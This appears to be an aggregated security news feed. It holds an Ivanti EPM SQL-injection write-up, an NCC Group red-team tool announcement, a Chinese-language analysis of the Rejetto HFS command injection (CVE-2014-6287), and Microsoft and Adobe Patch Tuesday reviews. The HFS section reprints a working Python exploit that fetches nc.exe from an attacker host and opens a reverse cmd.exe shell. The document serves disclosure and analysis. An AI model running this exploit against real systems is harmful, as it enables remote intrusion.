Now that we have found a viable path to the vulnerable function, our attention turns to triggering the vulnerable function. First, using IIS Manager, we notice that EventHandler.cs is hosted on the /WSStatusEvents endpoint.

IIS Manager WSStatusEvents

IIS Manager WSStatusEvents

Navigating to the endpoint in a browser, we are led to a page that shows up some example requests and responses.

UpdateStatusEvents Examples

UpdateStatusEvents Examples

Now, we can copy these example requests into Burp Suite and begin modifying them to see if we can trigger the exploit. Using dyspy, we attach to the IIS process hosting the vulnerable endpoint and start sending requests. After a little bit more reversing, we come up with a fairly trivial request using xp_cmdshell to gain RCE.

Successfully exploiting using Burp

Successfully exploiting using Burp

Finally, we see notepad.exe running under sqlservr.exe proving that our exploit worked!

notepad running under sqlservr.exe

notepad running under sqlservr.exe

Indicators of Compromise

The MS SQL logs can be examined for evidence of xp_cmdshell being utilized to obtain command execution. Note that this is likely not the only method for gaining RCE, but it is a popular one.

SQL Server logs showing evidence of xp_cmdshell usage.

SQL Server logs showing evidence of xp_cmdshell usage.

NodeZero

NodeZero Attack Path utilizing CVE-2024-29824 to load a remote access tool and access files 

Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

 

The post CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability appeared first on Horizon3.ai.

Stepping Stones – A Red Team Activity Hub

12 June 2024 at 13:31

Executive Summary

NCC Group is pleased to open source a new tool built to help Red Teams log their activity for later correlation with the Blue Team’s own logging. What started as a simple internal web based data-collection tool has grown to integrate with Cobalt Strike and BloodHound to improve the accuracy and ease of activity recording. As the tool became integral to how NCC Group’s Full Spectrum Attack Simulation (FSAS) team delivered Red and Purple Team assessments additional functionality such as reporting plugins and credential analysis have grown the tool into something we believe could benefit the wider Red Teaming community.

Access the code at: https://github.com/nccgroup/SteppingStones

Features

Activity Recording

At the heart of Stepping Stones are “Events” which describe a specific Red Team action between a source and a target. They can be annotated with MITRE ATT CK IDs, tags or the raw command line evidence, but the original design philosophy was to make data capture as effortless as possible so none of these are mandatory in order to allow data to be entered “in the heat of battle” rather than retrospectively.

Additionally, files can be dropped onto an Event to record where artifacts have been placed (allowing more effective post-job clean-up) and to generate file hashes for Blue Team reporting.

Cobalt Strike Integration

Stepping Stones includes a bot which can connect to your Cobalt Strike team server and stream activity into Stepping Stones. This is held in a separate area of the application so that the only relevant activity can be “cherry picked” and escalated into a reportable Event. This “cherry-picking” workflow also applies to other types of ingested activity like PowerShell transcripts imported via the bespoke EventStream format.

Alternatively, as beacons are spawned the source/target dropdowns for Events are updated with any new hosts, users and processes so that Events can also be manually recorded against the compromised systems.

Having access to real-time Cobalt Strike activity facilitates other functionality such as being able to notify (via webhooks) when a beacon first connects, or mark one as “watched” so that a Red Team operator can be re-notified should a dormant beacon reconnect, e.g. when a victim powers on their laptop the next day. Beacons and their associated activity can alternatively be excluded from the UI, reports and notifications if they match configurable patterns that identify them as the result of internal testing rather than genuine victim activity.

BloodHound Integration

To further improve the accuracy of sources and targets Stepping Stones can connect to BloodHound’s Neo4j database and use the data within to suggest users and hosts.

Again, with this integration in place a number of other features were subsequently added to make the life of the Red Team operator easier: there is a tree view of the domain(s) OU structure in Stepping Stones based on the BloodHound data – allowing a more familiar hierarchical target selection view of the graph data. Similarly, Stepping Stones facilitates building wordlists from text in BloodHound to help crack those accounts whose password is derived from the account name or a comment on the user in AD.

Credentials

A successful Red Team operation will come across a number of passwords, secrets and hashes on their way to meeting their objectives. Managing these can be cumbersome and the Credentials area of Stepping Stones aims to alleviate that. Hashes and passwords can be extracted from raw tool output or the streamed Cobalt Strike activity, and any associated compromised accounts marked as “owned” within BloodHound automatically.

Features from https://github.com/crypt0rr/pack/ have been re-implemented to generate likely wordlists and hashcat masks from previously cracked data.

A graphical dashboard provides further insight into the patterns used for passwords, generating graphs for statistics like those produced by https://github.com/digininja/pipal and comparisons against the https://haveibeenpwned.com/ breached passwords.

Architecture

Stepping Stones has been “dog fooded” by the FSAS team throughout its multi-year development and has been able to happily scale up to multi-month jobs. However, the system aims to still be useful even if not integrated with Cobalt Strike/BloodHound.

It is a Python Django web application which can run on either Windows or Linux. The philosophy is to deploy a fresh instance for each engagement, as it supports multiple users, but not multiple engagements. The database is currently SQLite, allowing all data for that engagement to be archived without cross contamination between jobs or a build up of multiple jobs worth of sensitive data.

Full installation and upgrade steps can be found in the read me file.

Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer

12 June 2024 at 13:05

Business Wire 06/12/2024

Horizon3.ai, a leading provider of autonomous security solutions, today announced the appointment of Jill Passalacqua as Chief Legal Officer (CLO), effective immediately. As Chief Legal Officer, Jill leads Horizon3.ai’s legal department, bringing extensive experience in advising prominent public and private technology companies…

Read the entire article here

The post Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer appeared first on Horizon3.ai.

[CVE-2014-6287]Rejetto HTTP File Server远程命令执行漏洞分析

12 June 2024 at 09:00

作者:k0shl 转载请注明出处:https://whereisk0shl.top


漏洞说明


软件下载:
https://sourceforge.net/projects/hfs/files/HFS/2.3b/ (感谢@1195011908更正目标软件下载地址)

PoC:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
  
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

直接运行,输入想执行的命令即可


此漏洞是一个命令注入漏洞,原因是hfs.exe中,对于检测规则控制不严格,导致可以利用%00截断符绕过检测机制,从而执行后面的命令,达到任意命令执行的目的,下面对此漏洞进行详细分析。


漏洞分析


这里使用?search = %00{.exec|calc.}作为测试代码,首先hfs.exe会在00403282地址处,接收到search请求的字符串。

0:000> g
Breakpoint 3 hit
eax=0012e5b0 ebx=0012f620 ecx=0000000d edx=010c78e8 esi=0012e5b0 edi=010c78e8
eip=00403282 esp=0012e598 ebp=00000016 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
hfs_exe_unpacked_+0x3282:
00403282 df3c11          fistp   qword ptr [ecx+edx] ds:0023:010c78f5=0000000000637c63
0:000> dc 010c78ef
010c78ef  652e7b00 7c636578 00000063 00000000  .{.exec|c.......
010c78ff  00000000 0c7ef900 431e6401 00000000  ......~..d.C....
010c790f  4355fc00 cebf0000 d066d800 cebf3800  ..UC......f..8..
010c791f  00000800 000060ff 00000000 0c7f4900  .....`.......I..
010c792f  00000001 00000000 53464800 4449535f  .........HFS_SID
010c793f  332e303d 37323730 31303031 30323631  =0.3072710011620
010c794f  00003730 0c815100 00000001 00001a00  07...Q..........
010c795f  72623c00 d6bbb23e bbd6b3a7 d3acbaf2  .<br>...........
0:000> dc edx
010c78e8  72616573 003d6863 78652e7b 637c6365  search=.{.exec|c

在010c78e8位置是在接收字符串,实际上,这个地址外层函数实现的功能是对接收到的GET参数进行判断,从而执行不同的代码逻辑,这里胡接收到?search的内容。

接下来,程序会进入一处正则表达式匹配,在这里,会对接收到的参数内容进行过滤。

.text:00509828                 push    ebx
.text:00509829                 push    0
.text:0050982B                 mov     ecx, offset dword_50986C
.text:00509830                 mov     edx, offset a__ ; "\\{[.:]|[.:]\\}|\\|"
.text:00509835                 mov     eax, [ebp+var_4]
.text:00509838                 call    sub_50A848

在这个过程中,会逐一遍历search后面的参数,也是漏洞触发的关键原因。地址00509830位置会将正则字符串推入栈中进行匹配。匹配后会进行转码,从而避免执行命令。

比如,当我们输入一个正常search参数的时候。

0:000> g
Breakpoint 1 hit
eax=00d135c8 ebx=00579ecc ecx=0000002f edx=00000003 esi=00000003 edi=00000030
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d135c8  65722e7b 63616c70 7c227c65 6f757126  {.replace|"|&quo
00d135d8  207c3b74 32312326 652e3b33 26636578  t;| {.exec&
00d135e8  34323123 6c61633b 34232663 2e7d3b36  #124;calc.}.

可以看到对应部分已经被转码,但是这里却没有对%00作为判断,默认遇到%00就截断了,因此可以利用这个方法绕过检测。

0:000> bp 00509147 ".if(@eax == 0x00d22728){;}.else{g;}"

0:000> g
(344.348): Unknown exception - code 0eedfade (first chance)
(344.348): Unknown exception - code 0eedfade (first chance)
eax=00d22728 ebx=00579ecc ecx=0000000c edx=00000004 esi=00000003 edi=0000000d
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d22728  652e7b00 7c636578 636c6163 00007d2e  .{.exec|calc.}..

这里可以看到处理后的字符串没有转码,直接输出了,这就造成了漏洞的发生,接下来。

int __stdcall sub_5096E0(signed int a1, int a2)
{
  int result; // eax@2
  int savedregs; // [sp+Ch] [bp+0h]@2

  if ( a1 <= 50 )
  {
    sub_508ECC(&savedregs);
    result = sub_509418((int)&savedregs);
  }
  return result;
}

程序胡自进入sub_5096E0中对字符串进行处理,这里所谓的处理过程,就是对于exec和calc的分开,主要就是为了后续匹配exec,然后执行calc。首先

0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405987 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5987:
00405987 7f11            jg      hfs_exe_unpacked_+0x599a (0040599a)     [br=0]
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405989 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5989:
00405989 01c2            add     edx,eax
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00d2272b esi=0000000c edi=0000000d
eip=0040598b esp=0012f020 ebp=0012f044 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x598b:
0040598b 8b442408        mov     eax,dword ptr [esp+8] ss:0023:0012f028=0012f080
0:000> dc edx
00d2272b  63657865 6c61637c 007d2e63 007c5c00  exec|calc.}..\|.
00d2273b  d2310100 00000000 00000c00 53464800  ..1..........HFS
00d2274b  cfc5d03d d0d0d6a2 d00000c4 0000edb1  =...............
00d2275b  d1c00000 00000100 00001000 74706f00  .............opt
00d2276b  2e6e6f69 6d6d6f63 3d746e65 31000031  ion.comment=1..1
00d2277b  d1c00000 00000100 00000e00 4c505500  .............UPL
00d2278b  2044414f 55534552 0053544c 00000000  OAD RESULTS.....
00d2279b  d1c00000 00000100 00000e00 524c4100  .............ALR

这里会处理字符串{.部分,获得一个新的字符串,然后继续跟踪。

0:000> g
Breakpoint 8 hit
eax=010c3150 ebx=0012ed54 ecx=636c6163 edx=010c2af0 esi=010c3150 edi=010c2af0
eip=00403324 esp=0012ed00 ebp=0012ed34 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
hfs_exe_unpacked_+0x3324:
00403324 c3              ret
0:000> dc eax
010c3150  636c6163 6c610000 00650063 010c2960  calc..alc.e.`)..
010c3160  00000001 0000000b 72616553 cb3d6863  ........Search=.
010c3170  00f7cbd1 010c2960 00000001 0000000b  ....`)..........
010c3180  646c6f46 c43d7265 00bcc2bf 010c2960  Folder=.....`)..
010c3190  00000001 00000009 6b636142 bbb5b73d  ........Back=...
010c31a0  312d00d8 010c2960 00000001 0000000b  ..-1`)..........
010c31b0  b73d7055 c9d8bbb5 00e3b2cf 010c2960  Up=.........`)..
010c31c0  00000001 00000009 656d6f48 d2d7ca3d  ........Home=...
0:000> dc 010c2b68
010c2b68  63657865 78650000 00006365 010c2960  exec..exec..`)..
010c2b78  00cc49a0 00000007 70747468 002f2f3a  .I......http://.
010c2b88  00650031 010c2960 00000001 00000009  1.e.`)..........
010c2b98  454d4954 46454c20 00000054 010c2a71  TIME LEFT...q*..
010c2ba8  00000000 00000007 45464552 00524552  ........REFERER.
010c2bb8  00454d49 010c2960 00000001 00000008  IME.`)..........

通过下内存写入断点,可以看到处理后会将exec和calc分开。接下来程序会进入一处sub_52CE88函数,这个函数会对calc字符串进行拷贝。

int __usercall sub_52CE88@<eax>(int a1@<eax>, int a2@<edx>, int a3@<ebx>)
{
  int v3; // esi@1
  int v4; // ecx@1
  int v5; // ecx@1
  int v6; // ecx@1
  int v7; // ebx@3
  int *v8; // ecx@5
  unsigned int v10; // [sp-Ch] [bp-1Ch]@1
  void *v11; // [sp-8h] [bp-18h]@1
  int *v12; // [sp-4h] [bp-14h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v13 = 0;
  v3 = a2;
  v14 = a1;
  __linkproc__ LStrAddRef();
  v12 = &savedregs;
  v11 = &loc_52CF19;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  __linkproc__ LStrAsg(v4, v14);

这步完成之后继续单步跟踪。

.text:00537063 loc_537063:                             ; CODE XREF: sub_535540+1B16j
.text:00537063                 mov     eax, [ebp+var_4]
.text:00537066                 mov     edx, offset aExec ; "exec"
.text:0053706B                 call    @@LStrCmp       ; __linkproc__ LStrCmp
.text:00537070                 jnz     short loc_537079
.text:00537072                 push    ebp
.text:00537073                 call    sub_5328E8

程序会在这里和exec做一次匹配,如果匹配成功,则会执行接下来的call sub_5328E8操作。

Breakpoint 3 hit
eax=010c3f78 ebx=00d07ad0 ecx=63657865 edx=00538970 esi=00000003 edi=00000006
eip=0053706b esp=0012edb4 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x13706b:
0053706b e8e8e7ecff      call    hfs_exe_unpacked_+0x5858 (00405858)
0:000> dc eax
010c3f78  63657865 253d0000 00263030 010c2960  exec..=%00&.`)..
010c3f88  00000002 00000009 63657865 6c61637c  ........exec|cal
010c3f98  00260063 010c2960 00000001 00000007  c.&.`)..........
010c3fa8  6165733f 00686372 00000000 0d3d7364  ?search.....ds=.
010c3fb8  616e650a 2d656c62 7263616d 793d736f  .enable-macros=y
010c3fc8  0a0d7365 2d657375 74737973 692d6d65  es..use-system-i
010c3fd8  736e6f63 7365793d 696d0a0d 696d696e  cons=yes..minimi
010c3fe8  742d657a 72742d6f 793d7961 0a0d7365  ze-to-tray=yes..
0:000> dc edx
00538970  63657865 00000000 ffffffff 00000014  exec............
00538980  a8b6e8c9 d8b55049 c4b5b7d6 c8b6d9cb  ....IP..........
00538990  c6d6decf 00000000 00000000 447a0000  ..............zD

可以看到,这里匹配的两个字符串指针eax和edx都是exec,也就是执行字符串匹配成功,接下来会进入sub_5328E8。

.text:00532AD9 loc_532AD9:                             ; CODE XREF: sub_5328E8+D7j
.text:00532AD9                 mov     eax, [ebp+arg_0]
.text:00532ADC                 push    eax
.text:00532ADD                 lea     edx, [ebp+var_2C]
.text:00532AE0                 mov     eax, [ebp+arg_0]
.text:00532AE3                 mov     eax, [eax-10h]
.text:00532AE6                 call    sub_52CE88
.text:00532AEB                 mov     eax, [ebp+var_2C]
.text:00532AEE                 mov     ecx, 5
.text:00532AF3                 mov     edx, [ebp+var_4]
.text:00532AF6                 call    sub_50CEC4

到达00532AF6地址位置,调用了sub_50CEC4函数,这个函数就是执行函数,来看一下伪代码。

char *__usercall sub_50CEC4@<eax>(_BYTE *a1@<eax>, int a2@<edx>, signed __int32 a3@<ecx>)
{
  nShowCmd = _InterlockedExchange((volatile signed __int32 *)&v46, a3);

      if ( v46
        && (v20 = nShowCmd,
            v21 = (const CHAR *)__linkproc__ LStrToPChar(),
            v22 = (const CHAR *)__linkproc__ LStrToPChar(),
            (unsigned int)ShellExecuteA(0, "open", v22, v21, 0, v20) > 0x20) )
      {

伪代码内部调用了ShellExecuteA函数,执行了任意命令。

总结一下整个过程,程序在对接收到的search函数进行处理的过程中,会进行一次正则表达式匹配转码,而这个过程没有对%00字符串进行处理,从而误认为遇到%00就结束了,从而利用这种方法绕过正则匹配,这样在后续分解过程中,可以用exec匹配到执行命令,执行任意命令。
```

Only one critical issue disclosed as part of Microsoft Patch Tuesday

11 June 2024 at 17:46
Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those there is only one critical vulnerability. Every other security issues disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. However, this vulnerability does not disclose confidential information, but it could allow the adversary to delete data that could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers are “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerabilities in the Windows kernel, exists that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary should first login to the system and then run a specially crafted application that could exploit the vulnerability and take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges and exploiting CVE-2024-30087 and CVE-2024-30091, would gain the rights of the user that is running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity, and more “likely exploitable” elevation of privilege vulnerabilities in NT kernel drivers. Successful exploitation of these vulnerabilities would provide the local user and SYSTEM privileges to an adversary, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more likely exploitable, high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

11 June 2024 at 17:31

Somehow, we’ve made it to the sixth patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop,  Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges of systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.  

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE Title Severity CVSS Public Exploited Type
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-35254 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2024-37325 † Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-29187 * GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM Important 7.3 No No EoP
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 4.4 No No EoP
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-50868 * MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU Important 7.5 Yes No DoS
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability Important 4.7 No No RCE
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability Important 6.8 No No EoP
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 6.7 No No RCE
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
